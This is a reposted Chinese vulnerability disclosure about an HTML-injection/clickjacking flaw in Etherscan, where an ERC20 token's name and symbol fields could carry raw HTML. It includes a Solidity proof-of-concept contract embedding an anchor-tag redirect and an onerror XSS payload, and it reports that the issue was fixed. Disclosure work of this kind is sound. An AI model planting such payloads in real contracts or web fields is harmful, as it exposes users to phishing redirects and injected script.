etherscan点击劫持漏洞

栏目: 编程工具 · 发布时间: 6年前

内容简介:https://etherscan.io部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。在用户访问点击页面内的合约名字,可以劫持至任意网站。

漏洞URL:如果是Web就填写此项

https://etherscan.io

简要描述:漏洞说明、利用条件、危害等

部署合约代币时,符合ERC20标准的情况下,symbol和name自定义,可嵌入a标签覆盖原本的标签。

在用户访问点击页面内的合约名字,可以劫持至任意网站。

需要部署ERC20标准的合约,且在访问合约页面之前,发起一次交易。

漏洞证明:

https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns

etherscan点击劫持漏洞

漏洞利用代码:

pragma solidity ^0.4.24;

contract MyTest {

mapping(address => uint256) balances;

uint256 public totalSupply;

mapping (address => mapping (address => uint256)) allowance;

address public owner;

string public name;

string public symbol;

uint8 public decimals = 18;

event Transfer(address indexed _from, address indexed _to, uint256 _value);

function MyTest() {

name = "<a href=http://baidu.com>12321</a>";

symbol = 'ok<img src=/ onerror=alert(1)> ';

totalSupply = 100000000000000000000000000000000000;

}

function mylog(address arg0, address arg1, uint256 arg2) public {

Transfer(arg0, arg1, arg2);

}

}

修复方案:

过滤

————————————————————————————————

经与Etherscan厂商联系,目前已修复该漏洞


以上所述就是小编给大家介绍的《etherscan点击劫持漏洞》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Beginning ASP.NET 4 in C# and Vb

Beginning ASP.NET 4 in C# and Vb

Imar Spaanjaars / Wrox / 2010-3-19 / GBP 29.99

This book is for anyone who wants to learn how to build rich and interactive web sites that run on the Microsoft platform. With the knowledge you gain from this book, you create a great foundation to ......一起来看看 《Beginning ASP.NET 4 in C# and Vb》 这本书的介绍吧!

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器